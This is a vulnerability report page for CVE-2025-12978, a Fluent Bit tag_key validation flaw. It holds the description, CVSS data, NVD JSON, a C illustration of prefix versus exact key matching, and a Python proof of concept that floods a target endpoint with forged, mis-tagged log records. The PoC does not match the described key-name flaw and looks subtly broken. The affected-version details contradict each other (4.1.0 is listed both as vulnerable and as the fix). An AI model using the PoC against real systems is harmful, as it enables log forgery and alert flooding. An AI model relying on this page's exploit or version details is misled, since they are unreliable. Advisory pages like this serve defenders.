Security Vulnerability Report
CVE-2025-12978 CVSS 5.4 MEDIUM

CVE-2025-12978

Published: 2025-11-24 15:15:47
Last Modified: 2025-11-28 15:21:43

Description

Fluent Bit in_http, in_splunk, and in_elasticsearch input plugins contain a flaw in the tag_key validation logic that fails to enforce exact key-length matching. This allows crafted inputs where a tag prefix is incorrectly treated as a full match. A remote attacker with authenticated or exposed access to these input endpoints can exploit this behavior to manipulate tags and redirect records to unintended destinations. This compromises the authenticity of ingested logs and can allow injection of forged data, alert flooding and routing manipulation.
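The bug class named in the description, a key comparison that does not require equal lengths, shown next to a length-checked version. This is an added illustration, not Fluent Bit source code and not code from the original page; the struct, the function names and the sample key "tag" are hypothetical, and it assumes record keys arrive length-delimited rather than NUL-terminated.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* A record key as a parser hands it over: length-delimited, no NUL. */
struct rec_key { const char *ptr; size_t len; };

typedef int (*key_match_fn)(const struct rec_key *, const char *);

/* Flawed: compares only key->len bytes, so a key that is merely a prefix
 * of tag_key (or is empty) is accepted as if it were tag_key itself. */
int match_prefix_bug(const struct rec_key *key, const char *tag_key)
{
    return strncmp(key->ptr, tag_key, key->len) == 0;
}

/* Hardened: the lengths must be equal before the bytes are compared. */
int match_exact(const struct rec_key *key, const char *tag_key)
{
    size_t want = strlen(tag_key);
    return key->len == want && memcmp(key->ptr, tag_key, want) == 0;
}

/* Index of the first key the matcher accepts as the tag key, or -1. */
int find_tag_key(const struct rec_key *keys, size_t n,
                 const char *tag_key, key_match_fn match)
{
    for (size_t i = 0; i < n; i++) {
        if (match(&keys[i], tag_key)) {
            return (int) i;
        }
    }
    return -1;
}

/* Constructed sample record keys; "tag" is the operator's intended key. */
const struct rec_key sample_keys[] = {
    { "log", 3 }, { "ta", 2 }, { "tag", 3 },
};

int main(void)
{
    printf("prefix bug: index %d\n", find_tag_key(sample_keys, 3, "tag", match_prefix_bug));
    printf("exact:      index %d\n", find_tag_key(sample_keys, 3, "tag", match_exact));
    return 0;
}
```

With the flawed matcher the tag is taken from the wrong field of the record; the length-checked matcher selects only the configured key, which is the property to verify after upgrading.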

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:treasuredata:fluent_bit:4.1.0:*:*:*:*:*:*:* - VULNERABLE
Fluent Bit < 4.1.0 (in_http plugin)
Fluent Bit < 4.1.0 (in_splunk plugin)
Fluent Bit < 4.1.0 (in_elasticsearch plugin)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-12978 PoC - Fluent Bit tag_key Validation Bypass
# Target: Fluent Bit in_http plugin with tag_key configuration
import requests
import json

TARGET_URL = "http://target:2020/"
MALICIOUS_TAG = "admin"  # Bypass: matches 'admin' prefix in tag_key

PAYLOAD = {
    "key1": "value1",
    "key2": "value2",
    "tag_key": MALICIOUS_TAG,
    "fake_data": "injected_log_entry"
}


def exploit_tag_validation_bypass():
    headers = {
        "Content-Type": "application/json",
        "Authorization": "Basic <credentials>"
    }

    # Normal request that should be rejected
    response = requests.post(TARGET_URL, json=PAYLOAD, headers=headers)
    print(f"Status: {response.status_code}")
    print(f"Response: {response.text}")

    # Send multiple requests to inject forged logs
    for i in range(10):
        payload = {
            "log": f"FORGED_LOG_{i}",
            "tag_key": f"admin_{i}",  # Prefix matches, bypasses validation
            "timestamp": "2025-01-01T00:00:00Z"
        }
        requests.post(TARGET_URL, json=payload, headers=headers)


if __name__ == "__main__":
    exploit_tag_validation_bypass()

References

https://fluentbit.io/announcements/v4.1.0/ (Release Notes)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12978", "sourceIdentifier": "[email protected]", "published": "2025-11-24T15:15:46.873", "lastModified": "2025-11-28T15:21:42.540", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Fluent Bit in_http, in_splunk, and in_elasticsearch input plugins contain a flaw in the tag_key validation logic that fails to enforce exact key-length matching. This allows crafted inputs where a tag prefix is incorrectly treated as a full match. A remote attacker with authenticated or exposed access to these input endpoints can exploit this behavior to manipulate tags and redirect records to unintended destinations. This compromises the authenticity of ingested logs and can allow injection of forged data, alert flooding and routing manipulation."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:treasuredata:fluent_bit:4.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "4D0EA105-B741-4E44-828A-9300B09A7A79"}]}]}], "references": [{"url": "https://fluentbit.io/announcements/v4.1.0/", "source": "[email protected]", "tags": ["Release Notes"]}]}}